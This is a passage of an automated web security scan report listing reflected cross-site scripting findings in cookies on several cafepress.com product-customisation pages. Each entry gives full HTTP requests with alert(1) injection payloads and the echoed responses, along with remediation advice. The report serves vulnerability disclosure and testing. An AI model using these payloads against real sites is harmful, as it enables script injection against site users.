__utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAd08c3"-alert(1)-"5c9b7d83b0c ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 54737 Date: Sun, 26 Dec 2010 13:48:17 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54737 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAd08c3"-alert(1)-"5c9b7d83b0c "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.101. http://www.cafepress.com/make/custom-buttons [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-buttons
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 467e9</script><script>alert(1)</script>f97ce1fac6a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-buttons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=467e9</script><script>alert(1)</script>f97ce1fac6a ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 54759 Date: Sun, 26 Dec 2010 13:48:16 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54759 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '467e9</script><script>alert(1)</script>f97ce1fac6a ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.102. http://www.cafepress.com/make/custom-hats [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-hats
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1aa5"-alert(1)-"c0e3e257a86 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-hats HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAb1aa5"-alert(1)-"c0e3e257a86 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 54696 Date: Sun, 26 Dec 2010 13:48:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54696 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAb1aa5"-alert(1)-"c0e3e257a86 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.103. http://www.cafepress.com/make/custom-hats [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-hats
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a30c5</script><script>alert(1)</script>e0b31c17436 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-hats HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=a30c5</script><script>alert(1)</script>e0b31c17436 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 54711 Date: Sun, 26 Dec 2010 13:48:30 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54711 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'a30c5</script><script>alert(1)</script>e0b31c17436 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
1.104. http://www.cafepress.com/make/custom-hoodies-sweatshirts [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-hoodies-sweatshirts
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5222"-alert(1)-"66934ad12b9 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-hoodies-sweatshirts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAb5222"-alert(1)-"66934ad12b9 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 69614 Date: Sun, 26 Dec 2010 13:47:58 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 69614 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAb5222"-alert(1)-"66934ad12b9 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.105. http://www.cafepress.com/make/custom-hoodies-sweatshirts [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-hoodies-sweatshirts
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b326</script><script>alert(1)</script>7b9d98d964e was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-hoodies-sweatshirts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=9b326</script><script>alert(1)</script>7b9d98d964e ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 69636 Date: Sun, 26 Dec 2010 13:47:56 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 69636 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '9b326</script><script>alert(1)</script>7b9d98d964e ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
